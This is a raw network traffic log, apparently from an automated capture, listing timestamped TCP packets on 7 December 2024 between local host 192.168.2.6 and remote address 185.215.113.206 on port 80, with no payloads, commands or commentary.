Dec 7, 2024 10:51:50.845273018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.845424891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.845519066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.846038103 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.846143007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.846267939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.846987963 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.847053051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.847126007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.847851992 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.847934008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.847975969 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.848026037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.848800898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.848884106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.848917007 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.848949909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.849663973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.849714041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.849741936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.849761009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.850676060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.850729942 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.850851059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.850939989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.851589918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.851690054 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.851736069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.852384090 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.852430105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.852492094 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.852529049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.853308916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.853360891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.853413105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.853449106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.854202032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.854358912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.854413033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.855112076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.855201006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.855230093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.855290890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.964481115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.964514017 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.964560986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.964593887 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.964760065 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.964801073 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.964845896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.964900017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.965677977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.965720892 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.965742111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.965764999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.966545105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.966599941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.966664076 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.966826916 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.967452049 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.967556953 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.967562914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.967659950 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.968367100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.968430996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.968446970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.968486071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.969254971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.969320059 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.969372988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.969414949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.970186949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.970236063 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.970289946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.970410109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.971056938 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.971105099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.971107960 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.971146107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.972007036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.972068071 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.972127914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.972166061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.972923994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.972979069 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.973020077 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.973166943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.973858118 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.973887920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.973916054 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.973932981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.974759102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.974803925 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.974822044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.974864006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.975615978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.975740910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.975800037 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.975853920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.976531982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.976605892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.976641893 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.976681948 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:50.977458954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:50.977529049 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.013322115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.013339996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.013416052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.013417006 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.013458014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.013458014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.013540983 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.013680935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.014307976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.014400005 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.014429092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.014497042 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.015240908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.015322924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.015337944 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.015377998 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.016108990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.016185999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.016205072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.016247034 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.016995907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.017061949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.017112970 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.017220974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.017910957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.017985106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.018044949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.018150091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.018829107 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.018971920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.018975973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.019016981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.019733906 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.019778967 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.019841909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.019915104 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.020641088 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.020728111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.020868063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.020962000 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.021516085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.021620035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.021635056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.021764040 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.022424936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.022536039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.022536993 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.022583008 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.023333073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.023467064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.023492098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.023619890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.024265051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.024359941 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.024385929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.024414062 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.025166988 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.025254965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.025258064 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.025305986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.026038885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.026108027 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.026196957 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.026247025 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.027215004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.027230978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.027867079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.027973890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.028172970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.028808117 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.028870106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.028870106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.028930902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.029686928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.029738903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.029793024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.029835939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.030594110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.030649900 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.030695915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.031507015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.031527042 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.031564951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.031579018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.032417059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.032466888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.032509089 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.032562017 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.033339024 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.033387899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.033411026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.033447981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.034209013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.034271955 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.034316063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.034377098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.035109997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.035155058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.035213947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.035255909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.036031008 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.036082029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.036170006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.036214113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.036941051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.036988974 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.037024975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.037065983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.037810087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.037863016 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.037925005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.038002014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.038753986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.038861990 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.038891077 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.038903952 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.039659977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.039768934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.040453911 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.040544033 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.040600061 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.040674925 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.040715933 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.041470051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.041527033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.041565895 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.041604996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.042362928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.042412996 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.042485952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.042529106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.043344975 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.043391943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.043421984 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.043464899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.044204950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.044253111 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.044311047 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.044454098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.045118093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.045166969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.045167923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.045214891 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.046006918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.046063900 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.046075106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.046113968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.046884060 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.046968937 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.046989918 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.047029018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.047777891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.047842979 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.047899961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.047965050 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.048682928 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.048728943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.156655073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.156725883 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.156831026 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.156873941 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.157160997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.157208920 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.157378912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.157422066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.157484055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.157516003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.158186913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.158243895 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.158313036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.158358097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.159091949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.159147024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.159233093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.159279108 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.160008907 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.160079956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.160129070 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.160881996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.160933018 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.161027908 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.161077976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.161864996 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.161922932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.161990881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.162030935 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.162708044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.162817955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.162842989 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.162863970 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.163650036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.163713932 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.163757086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.163794994 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.164525032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.164577007 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.164654016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.164701939 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.165462971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.165589094 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.165591955 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.165630102 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.166344881 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.166393995 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.166433096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.166471004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.167243958 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.167345047 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.167395115 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.167445898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.168165922 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.168234110 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.168242931 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.168284893 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.169070005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.169123888 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.169179916 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.169220924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.170222044 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.170249939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.170305014 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.170865059 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.170921087 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.205488920 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.205683947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.205732107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.205779076 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.205862045 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.206017971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.206047058 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.206094980 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.206767082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.206820965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:51.206934929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:51.206974983 CET	49808	80	192.168.2.6	185.215.113.206
